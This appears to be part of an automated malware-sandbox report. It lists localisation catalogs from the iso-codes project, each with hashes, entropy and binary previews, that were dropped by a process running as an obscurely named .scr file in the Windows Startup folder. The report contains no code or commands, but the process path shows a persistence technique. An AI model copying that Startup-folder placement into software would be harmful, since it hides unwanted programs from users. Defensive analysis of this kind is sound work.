                                                                                                    SHA-512:0C8E7ED96B870E313DB68D37C8F91748BD063BDC20BC99F42874592EB1CB02B74EE714189235E53AB6F27FA7BEB28075D254AC53CEC6CCD82816128A1DD1259F
                                                                                                    Malicious:false
                                                                                                    Preview:................D....$..l........M.......M.......M.......M.......M.......N.......N.......N.......N.......N......(N......0N......5N......:N......@N......MN......TN......\N......cN......lN......vN.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......O.......O......"O......1O......7O......>O......CO......TO......lO......rO......zO.......O.......O.......O.......O.......O.......O.......O.......O.......O.......O.......O.......O.......O.......O.......P.......P.......P.......P.......P...... P......%P......:P......AP......JP......TP......iP......qP......yP.......P.......P.......P.......P.......P.......P.......P.......P.......P.......P.......P.......P.......Q.......Q......#Q......0Q......@Q......PQ......^Q......sQ.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......R.......R.......R.......R.......R......%R......2R......?R......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 96 messages, Project-Id-Version: iso_639-5 'Bahasa Afro-Asiatik'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6346
                                                                                                    Entropy (8bit):4.775871997475478
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:K1KkKGcwF0DLyGRGtCNDu0E0BfChrMTCX06TedVxj1x0VpuVAELb9Bm:K45nhDLyGRnNi0E0Bf92rebx0Lu5lg
                                                                                                    MD5:993D0F2E535552388CA8AA4B212CC555
                                                                                                    SHA1:4E723ACC5B0A029F92E0A2CFE211521F991E4BE5
                                                                                                    SHA-256:7A4D1D7A2A06C052FD542673E4DD0558B8F4092FE264DDF57B5AB0336E08F3A8
                                                                                                    SHA-512:18D1D033BFC30FA60153DCC4169F8F1B1CD6A68087D2E9C57664DD4E010A6DA075B3E8C9E2BC78360F86EF8444B4C8EE08D82042467A00ED95B8F36E129F3248
                                                                                                    Malicious:false
                                                                                                    Preview:........`.......................(.......).......@.......U.......e.......z.......................................................................*.......C.......Z.......k.......~...................................................................!...........9.......S.......d.......u...........$.......#.......%...........................2.......J.......].......t...............................................................................3.......E.......Y.......j.......|...............................................................................,.......>.......Z.......q............................................................... .......5.......G.......Y.......l.......{.......................................................................-.......<.......R.......e.......}.......................k.......................................................................................!.......7.......H.......^.......x.......................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 210 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9210
                                                                                                    Entropy (8bit):4.704337453340897
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:7Q66TkC6KjjV9hYKJyo2kddTsPzugokVENSfGOIqYzU5EU05:7JKnTTydSdo7ugokVEfOI/g5EUa
                                                                                                    MD5:504B9202ECD7A5E2096711D826B111AD
                                                                                                    SHA1:6612BE0592553B5FA4C24F80313E954DB5599ABE
                                                                                                    SHA-256:B617BF91B39F7E8B19580CBF01CCD1CAD8D127E37D46CD15023B3A6F3A628D3E
                                                                                                    SHA-512:641ABFD3FF59C22AF1E5C4166E2DB0C03632B8E2BDC7EB999DD50EACECB3154BB0814755F7BBFF7EAD4E5AAA91A4B6EF5AAC5302A38043A74C5E981B0A70E906
                                                                                                    Malicious:false
                                                                                                    Preview:........................<.......................................................................................................................".......-.......5.......@.......I.......Q.......Y.......`.......f.......n.......u.......}...............................................................................................................G.......L.......R.......[.......c.......p.......{...............................................................................................................................5.......:.......B.......I.......Z.......`.......h.......p.......v.......................................................................................................................................................................*.......1.......7.......?.......E.......L.......S.......^.......d.......m.......t...............................................................................................................................................................%.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 'Adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10637
                                                                                                    Entropy (8bit):5.170106783608846
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:dcrNje9Oy/EWltU4WjV9qWxa5hW88SgcpPxsKRjsk2oNNu:UJA9EWg4WjVDxa5hW88Vss+js+Nw
                                                                                                    MD5:D316A67ABCCE4A69FE2096132D11ABC9
                                                                                                    SHA1:178A0645AF40E57EAF48EABB58BAF66462E9AA78
                                                                                                    SHA-256:36C444F77A3E1B966A84714FCC92DE131AEA87F54AAD0126E7E0D24A56E3140A
                                                                                                    SHA-512:736E36FB705C5888AA305B3D7DD3CE7C901A74BCC938E9DB050172CA4277C43CD7C1D04F9A26FB9B20300BFBD69E6C6A4F5BA498CA355722D1AF2A9ED7460D63
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24295
                                                                                                    Entropy (8bit):5.1734064049340756
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosxYAq8E13GC046nbjz5wsWP48WAINiZGQTLYXaJpPlwAlS:0oDvVx048fmsWP48WAIOvYXabPCAQ
                                                                                                    MD5:FC9310EE6EC49C3568D41BC8916396D5
                                                                                                    SHA1:A0C82F31622EC3157C5B5BFFA217046B31D9C77A
                                                                                                    SHA-256:03CD85FFD75823070848E43EE3A5DA03C38A439204514C28D78EA81B73683199
                                                                                                    SHA-512:63C021C44BC7A7DAD9C433B8D671A070B7D30E43EC9F937B525DE80294F9C82654CFC0C85D48C357E59AA5FA5B783AB866B5E7F30BF3242BCCA32BA418D51B84
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 92 messages, Project-Id-Version: iso_3166-2 'Alabama'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4405
                                                                                                    Entropy (8bit):4.867590425865491
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:vngUDLZw5xyLlAnuaI86lx8V0fQmq2n/f6l1CKcPt/BmUOQ3:v9ZAnuaInxUaQmP/iC1P1BCQ3
                                                                                                    MD5:0BFD6252D594868A0066C4047D66F8C9
                                                                                                    SHA1:16FC3D01DAF9C65B2A9E7B51DCB4A45A468AB454
                                                                                                    SHA-256:349DE4406792C4E383387DA015DECBE1D31C16A0965F1C1610CA886A008A5FDD
                                                                                                    SHA-512:09AF638B523AE0A9FF6AD8F9418C8A6D7B4A0C87A848DB05B50E061E9157FFBDEF4318D0636146988AD241E4718EAC21E8C6341F2AF9F8C51A93622CF23CCE92
                                                                                                    Malicious:false
                                                                                                    Preview:........\...............................................................................................................%.......,.......5.......;.......D.......M.......V......._.......d.......l.......t.......y.......~...............................................................................................................................................!.......).......5.......D.......I.......M.......^.......d.......i.......o.......{.......................................................................................................................:.......B.......K.......P.......U.......\.......f.......q.......|...................................................................$...........................%.......0.......<.......D.......V.......[...$..._....................................................................................................................................................... .......'......./.......4.......9.......=.......F.......Q.......[.......`.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 'Breska su\303\260urskautslandssv\303\246\303\260i\303\260'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2961
                                                                                                    Entropy (8bit):5.340882096919249
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3rlDlArsS/t+vGqIfdvqN5CoU960IC11srDWv1IZVT9BnR4moJuqy8:rLv1lArd+yaCos605IS+nuzJuq
                                                                                                    MD5:7492C79A258730699FF488A8B2CF0351
                                                                                                    SHA1:E3B319E502F8802E2A02FAD8CE04E9154571AEB5
                                                                                                    SHA-256:1F80D8D5F67FC99875745CBC0C26B358BFF02AA10C6C157A8B9643B1EBC324D1
                                                                                                    SHA-512:95D1811EE1B194ADA0389A6AAB388E1E7393F3DEA17680D69BB214BB3655EE886B5F1296134200F4AD991C1F3F855D339F4DDF743672D6D7A71AC4FA0367B4CA
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+.......................!.......0...!...5...R...........6...............................................1...5.......g...................................................A....... ...7.......X.......s.......z...".......4.......................................3...J.......~........... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 177 messages, Project-Id-Version: iso_4217 'ADB eining fyrir reikning'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9804
                                                                                                    Entropy (8bit):5.076062175012264
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:OYbsIVH9sqYP7i2RyK0G/2LC9r18gEyTjJESVkaoKzxS3vQ:vs9m2RL0G/UWB8gBDkOMQ
                                                                                                    MD5:AD82E759B35076C1C9A9B3CEACFE439D
                                                                                                    SHA1:2356F35A614C1A5F22458DEBA985CC2A3F6AC6AD
                                                                                                    SHA-256:F5617EF539E0F31BA748A7097EC62EBC62FD7C68C69EAAD37C1D656A14D1DBEE
                                                                                                    SHA-512:B6B622221262EC45098E7962744C9B9CE74C59CA34568D895BE07D88D51D7312A0AD16F7560925E978A432EEE60375922F2A42BF3EF61CF2A61A24389FE5A7AE
                                                                                                    Malicious:false
                                                                                                    Preview:........................,...............................................#.......1.......?.......Q.......b.......r...................................................................1.......3.......9...O...7...................................................................#.......5.......E.......[...0...h.......................................................................................".......(.......7.......=.......L.......Q.......g.......v...............................................................................................................".......*.......8.......E.......R.......^.......n.......~...............................................................................................................................................*.......<.......L...!...Y.......{...............................................................................................1.......:.......K.......[.......c.......r.......|...............................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 3510 messages, Project-Id-Version: Icelandic (iso-codes) ''Are'are'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):149997
                                                                                                    Entropy (8bit):5.2368339101502785
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:eXD+slPOkAmANniu00JOr1CNfvtSPYdACXTzCLc2irkVn8M3SbPpTPQzu7cN:ieLhehMflSPYjj2Y2irkVn8M3SbPprmf
                                                                                                    MD5:DB501005B3F17557C602255EAF5E4164
                                                                                                    SHA1:566A22C86BDCE0F05C266814575BDB125C72E448
                                                                                                    SHA-256:3283039E071CB3A882B70057B72D469E369A8CAC95F4CF0F5D3A04613C11EF67
                                                                                                    SHA-512:90872E5F742FAD2948E175B4D29739B7B00979294824CB408FAF83C9CF9CF6E123A0EF095F2C5B98B22B799751E4A4D020A3F484EA9008074AA453B0EDC73CC7
                                                                                                    Malicious:false
                                                                                                    Preview:.................m..S...|........$.......$.......$.......$.......$.......$.......$.......$.......%.......%.......%.......%......"%......*%......1%......:%......D%......T%......d%......i%......n%......t%......x%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&......#&......)&......0&......4&......>&......L&......T&......Z&......a&......h&......m&......t&......|&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......'.......'......''......2'......9'......B'......H'......R'......\'......c'......o'......w'......|'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(.......(.......(.......(......$(......-(......6(......>(......G(......L(......V(......_(......g(......k(......p(......u(......}(.......(.......(.......(.......(.......(.......(......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 116 messages, Project-Id-Version: iso_639-5 'Afr\303\263-as\303\255sk tungum\303\241l'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8015
                                                                                                    Entropy (8bit):5.000675667874566
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:4SDx4v39WK4f4SE0BfNca38bFnxzIZoWI:XWlZGE0BfNca38pnxzIZoWI
                                                                                                    MD5:8F5DE773CB8CEB032A307AB5AFF40BBB
                                                                                                    SHA1:9115969A6922C52972AD611725B879D264647690
                                                                                                    SHA-256:6D5351729480AD62BB7639E99A138CF041B0F6E6064F3AD537AFCC941AAC0892
                                                                                                    SHA-512:1F1BBBD97A4AECF49F8041A68A9E9EDA4F6C4F14F872AA7A784EF0F60504ED744AC88B5D7664588DC9204EFB723F874D6F6480C9C8BBBFE80D168EABC8F02014
                                                                                                    Malicious:false
                                                                                                    Preview:........t...............\............................................... .......5.......F.......W.......h.......{...............................................................&.......9.......I.......Y.......i.......y...................................!.......#...................2.......C.......T.......g.......x...$.......#.......%...........................".......:...#...P.......t.......................................................................*.......8.......H.......`.......w...............................................................................7.......G.......X.......h.......|...............................................................1.......J.......[.......l...............................................................................'.......9.......P.......a.......r...............................................................(.......9.......H.......Y.......j...........................#...............................#...........8.......O.......b.......v.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 172 messages, Project-Id-Version: iso_15924 'Adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9447
                                                                                                    Entropy (8bit):5.006380327770385
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:QXTE+02VKrY3G9zzib4DjVhSa5hW8cX310z++UbyCk4bmKbGEPVI9:4E+079u4DjVMa5hW8Q3Oy+UF5PG
                                                                                                    MD5:D1D521E7125DC4B73BE94976617CBD63
                                                                                                    SHA1:AEC3113D4D7DBB73BA7021836ECF83EC3B90E0DB
                                                                                                    SHA-256:DCF7227CBF302A9C1B5B1F5D1521E455E44E81364BA8966F5F195EFB4EF77567
                                                                                                    SHA-512:7C9E9E64948B6D947AB1DF25CAFBD1D67B3D4ABEAF42484AFCDD6D77E82624F8F8700CB0107AF182533D4005280E055E2502753ABB940AF286F016A7BB75D59F
                                                                                                    Malicious:false
                                                                                                    Preview:................|...............p.......q.......w...?...}....................................................................................... .......,.......5.......<.......D.......M.......S.......Z.......m.......t.......y...........................................................................&...'.......N......._...(...s.......................................................................................#.......,.......5.......O.......h...........................................................................4...........c.......l.......t.......{...................................................#...........................................".......(.......@.......W.......f.......l.......u.......~.......................................................................................................,.......=.......R.......a.......o...(...y...................................-.......................................#...........A..."...a...)...........................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 421 messages, Project-Id-Version: iso_3166-1 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23660
                                                                                                    Entropy (8bit):4.962433379573596
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:snboRT6k+bRBUr3iRirwISzmwZbjh5wsWP4XWAIziUGPBoEpiBOqkFSO/LrAqng:sxcr3iRik7zmotmsWP4XWAIg9IXkFSOS
                                                                                                    MD5:0C726D6DC0932E9C937F6FAFA96D292F
                                                                                                    SHA1:95A552CF8C08B8C9C072DCA041E9A1374107C37C
                                                                                                    SHA-256:3E81DF026C824563A59DB4E011BC404E99F833110DF737754B815DC69C467473
                                                                                                    SHA-512:24C677E6FF8BE867167A709FCF1FA4319D5EB86495EDAB7C64EB2B8D7306321696ABAB864CDB23AA1BC66A98F74026D395D481B02CD948B8EA9A50272753FAEE
                                                                                                    Malicious:false
                                                                                                    Preview:................D...3...l.......8#......9#......E#......M#......U#......d#......l#......s#......|#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......&$.......$......5$......;$......C$.. ...J$......k$......s$.. ....$.......$.......$.......$.......$.......$.......%.......%......1%......:%......G%......O%......Z%......c%......l%......s%.......%.......%.......%.......%.......%.......%.......%.......%.......%..,....&......@&......H&..%...N&......t&.......&.......&.......&.......&.......&.......&.......&.......&..%....&..,....&.."..."'..*...E'......p'......x'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(......#(..'...1(..$...Y(......~(.......(.......(.......(.......(.......).......).......)......#)......1)......B)......R)......n)......t).......).......).......).......).......).......).......).......).......).......).......).......).......).......*.......*.......*.......*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 3684 messages, Project-Id-Version: iso_3166-2 ''Eua'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):157445
                                                                                                    Entropy (8bit):5.230907502255685
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:DLZcUJqRx7M0piJznje9NfNVXddm+HSEg2lpJDyYRsO3dkHRc6+bA1Onpiw0:D9ccqRmr6j5yEgupPdOc6wA1Upm
                                                                                                    MD5:4036172CBE6A8031F4779E3805C58AEE
                                                                                                    SHA1:1108AA54609C4833FBB5E294CD4A1593812D89FD
                                                                                                    SHA-256:81AEEFD1120375C7616D04C0B981AC324753D0D60B1FBBD814DF266EF0542707
                                                                                                    SHA-512:BDEDA909CAA3D3B318E591822A038307CEBC071C058671084C09DEDBF11F52AA30E399F8DE663E90A0F1333E335EBDFDEDA09844176827C7E370DC5F4E9D6523
                                                                                                    Malicious:false
                                                                                                    Preview:........d.......<s..7...\.......83......93......>3......D3......L3......S3......a3......o3......t3......y3.......3.......3.......3.......3.......3.......3.......3.......3.......3.......3.......3.......3.......3.......3.......3.......3.......4.......4......%4....../4......>4......O4......^4......c4......o4......u4.......4.......4.......4.......4.......4.......4.......4.......4.......4.......4.......4.......4.......4.......4.......4.......4.......5.......5......%5......15......=5......M5......X5......d5......r5......{5.......5.......5.......5.......5.......5.......5.......5.......5.......5.......6.......6......&6......06......:6......B6......L6......Y6......c6......r6.......6.......6.......6.......6.......6.......6.......6.......6.......6.......6.......6.......7.......7.......7.......7.......7......'7......37......97......D7......L7......S7......Z7......c7......s7.......7.......7.......7.......7.......7.......7.......7.......7.......7.......7.......8.......8.......8.......8.......8......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 'Territorio antartico britannico'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2720
                                                                                                    Entropy (8bit):5.0931571792611905
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADl9SxjfGLRvGqIfdvqNuoUOvej3zuqVmVx4eNpu0:qDn9yBoTej3nUTNL
                                                                                                    MD5:A7CA16A51769645809BA54B41622A9B2
                                                                                                    SHA1:537F39822FBF8C5153A5E6F6456ACFE8356E7329
                                                                                                    SHA-256:3879F5A22D0745E280B80E622FC52EBDC2644EC0752607C1F909D08AF1A1B4CF
                                                                                                    SHA-512:DC69654AF7787A401D4BD0256CCBAF9F809DFFF007BA5CDCFB7F2C3686C6F436D3490B91F0F2B5AE178A1FAA9D583AF0687B34A82475AE65417C2BFE5AB58805
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c.......................`...1.......*...............2...........*.......2.......J.......T...+...j...$...................................................$.......2.......?.......n...................................4...............#...(.......L...,...[................................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 172 messages, Project-Id-Version: iso_4217 'Unit\303\240 di conto della ADB'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9244
                                                                                                    Entropy (8bit):4.897202216537123
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:zbcx66OE6YLXifAMQ1M29BypRHDdTNWtKMJVpkS2SILCLKmxej2jsKNUPIPmItg:Mx66a4MPPByK0nMLCzz45fItg
                                                                                                    MD5:B8A98B33357F309F0B3EA969487F2183
                                                                                                    SHA1:2337394063FD8D6B406BFED284738A34BE109B68
                                                                                                    SHA-256:1E8DB129CAA17C38868D27423C8D2B23AFFD24813B9E78E750568791A07B4E0F
                                                                                                    SHA-512:BE5885BC8A14F93C4082CBCC24549564AA85616B776C314C6BC18FE3FB366CC52A0A7EBC51209BE48EF6FC9B199462316BF6CDA0D113F4C62D86139DB4EB65C8
                                                                                                    Malicious:false
                                                                                                    Preview:................|...............p.......q.......................................................................................................%.......6.......D.......U......._...1...q...3.......9.......7...........I.......X.......f.......t...........................................................0...........!.......0.......?.......O.......`.......l.......~...............................................................................................................$.......;.......G.......N.......Y.......i.......n.......u.......}....................................................................................................... ...............5.......:.......?.......N.......R.......Z.......`.......p.......}.......................................................................................................$.......3.......Q.......d.......v...............................................................................................................,.......1.......=.......E.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 8453 messages, Project-Id-Version: iso_639-3 ''Are'are'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):369645
                                                                                                    Entropy (8bit):5.242143019319363
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:w2mPqvHL0UUhuLKOdyl/rtOYiCT9g+MLc0wWtenPUg8ETUc7ImtW/jH233fCx:w2P09ILKzknE18QbEmCIax
                                                                                                    MD5:FFDB8640EEB5468B24C62922B07B7F7D
                                                                                                    SHA1:73B4F3476C0E3A3D33C5DE6D2A6D78CF7FD3BF16
                                                                                                    SHA-256:68FB0FD4E64079B6B570C793C06367469FA3152B402DE5F4A273E7B2C2123564
                                                                                                    SHA-512:9259835EC86842F4047591132293D8381F2DBE4ABBCE5E867C33D19496822B68CC1222911D273027EF8179FADA15ECB9A42A3ACD7929B1FCCD66C099EC79E0AD
                                                                                                    Malicious:false
                                                                                                    Preview:.........!......D....,..l.......................................................................................................................................................................&.......6.......F.......K.......P.......V.......Z.......g.......l.......q.......v.......|............................................................................................................................................... .......8.......>.......F.......N.......T.......[.......a.......h.......l.......v...............................................................................................................................................'......./.......7.......=.......K.......Q.......V.......f.......l.......s.......w.......|.......................................................................................1.......E.......P.......W.......`.......f.......p.......z.......................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 107 messages, Project-Id-Version: iso_639-5 'Lingue camito-semitiche'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6985
                                                                                                    Entropy (8bit):4.74583521614471
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:4RXVa1s7yZNJAC6522g/ebsKuSE0Cufr5VcJHVCGej2VqJ3E/kMuaAhNhRkn:RtZNX6522gG+SE0ZcaKVqJEkMuHh+
                                                                                                    MD5:C7ABCE113AFF4B248E538A7B95637361
                                                                                                    SHA1:38F8D662C7BD7A287D4BBEEADDB12C6EDBB0EC20
                                                                                                    SHA-256:95947CD4590692297AC190882CEA2B4CEBB26E9FC07548B0E65E5A20F9F41CE3
                                                                                                    SHA-512:623636F71B95606BD3EECA532661AA48C8EA6C8FC6A86F5228B8226957F2A1630ADF20383A099C91033438D5EFB7379899ABC4331AB77142A0C133EAB15F1921
                                                                                                    Malicious:false
                                                                                                    Preview:........k.......t............... .......!.......8.......K.......[.......p.......................................................................+.......>.......N.......^.......n...................................!...................................%.......8.......I...%...]...................................#...........................-.......D.......W.......j.......z.......................................................................#.......5.......E.......W.......m.......{.......................................................................'.......9.......U.......l.......................................................................0.......B.......T.......f.......y.......................................................................+.......E.......\.......j....................................................................... ...#...6.......Z.......j.......z.......................................................................................$.......4.......K.......`.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 26 messages, Project-Id-Version: iso_3166-1 '\341\220\212\341\224\205\341\221\246\341\225\214\341\223\225\341\220\212'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1634
                                                                                                    Entropy (8bit):5.306254300623615
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:3Pws3nPQnQfa2KtSBaC5liUecFQyyd5l1TEaNbXjt0UjL/nXmGRnsFMb55vgYltU:fwYniUaA0UcfXTF9yU/eJgfpXD2
                                                                                                    MD5:382AE509B1EAE39CF80EFD6FE284EABD
                                                                                                    SHA1:442408BC80A51239117522A15CFF5A76D787CD67
                                                                                                    SHA-256:28C2F6E8B03C59FC9A949D87A66591A36BD1C37C95D119F1791A2E32C1266F1D
                                                                                                    SHA-512:F2E6433D89B9AFB48A884A591403565ABB55F0DD0683E02798E28A57A3A69294126E9C8624705C723B1130C5CB9A5E4282A73AB00344359F8F1CB57D3E7A7063
                                                                                                    Malicious:false
                                                                                                    Preview:....................%...........P.......Q.......[.......b.......h.......m.......u.......}.......................................................................................................................................................8...............".......,.......3.......A.......Q.......[.......n.......{...............................................................................................................*.......;.......R........................................................................................................................................................Australia.Canada.Chile.Cuba.Finland.Germany.Greenland.India.Indonesia.Iraq.Italy.Japan.Kazakhstan.Lithuania.Mexico.Norway.Pakistan.People's Republic of China.Peru.Poland.Spain.Sweden.Ukraine.United Kingdom.United States of America.Project-Id-Version: iso_3166-1.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2017-12-29 06:30+0000.Last-Translator: Chris Leo
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 70 messages, Project-Id-Version: iso_15924 '\343\202\242\343\203\251\343\203\223\343\202\242\346\226\207\345\255\227'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4131
                                                                                                    Entropy (8bit):5.36929315304893
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:nZSLbIbrE4AbdbAWJ9Vug3LXllUMp6R9bskGpiUJjY1a6V:nZSLbqEtbdjbllHp6RqzSMM
                                                                                                    MD5:2FF97E8A2069A14AE7744A80034180ED
                                                                                                    SHA1:B034A5F6E8084BCD36127BCCBC956AEC77210940
                                                                                                    SHA-256:FA32424C2F893001D1DA68A55FD23A8CE511BA595ACF744482FFD6C54AF4471D
                                                                                                    SHA-512:CB763847A7E41DC375C97B72E922A4447879188B390475EC98ADC58E7217F6A10823DFC57E442FCA2C7615565C961982B220E4952A60749C2F3DD8D6A548BDEA
                                                                                                    Malicious:false
                                                                                                    Preview:........F.......L...a...|............................................... .......(.......4.......=.......D.......L.......U.......[.......`.......i.......o.......v.......~...........................................................................................4...(.......].......f.......n.......w.......................................................................................................................................................%.......,.......4.......A.......H.......Q.......X.......^.......e.......l.......t.......{...........................%...................................................................................................4.......G.......W.......j.......z.......................................................................4.......D.......W.......p...................1.......0...........................,.......9.......X.......k.......x.......................................................................$.......7.......M.......i.......y...............
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 413 messages, Project-Id-Version: iso_3166-1 '\343\202\242\343\203\225\343\202\254\343\203\213\343\202\271\343\202\277\343\203\263'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24942
                                                                                                    Entropy (8bit):5.500632735620859
                                                                                                    Encrypted:false
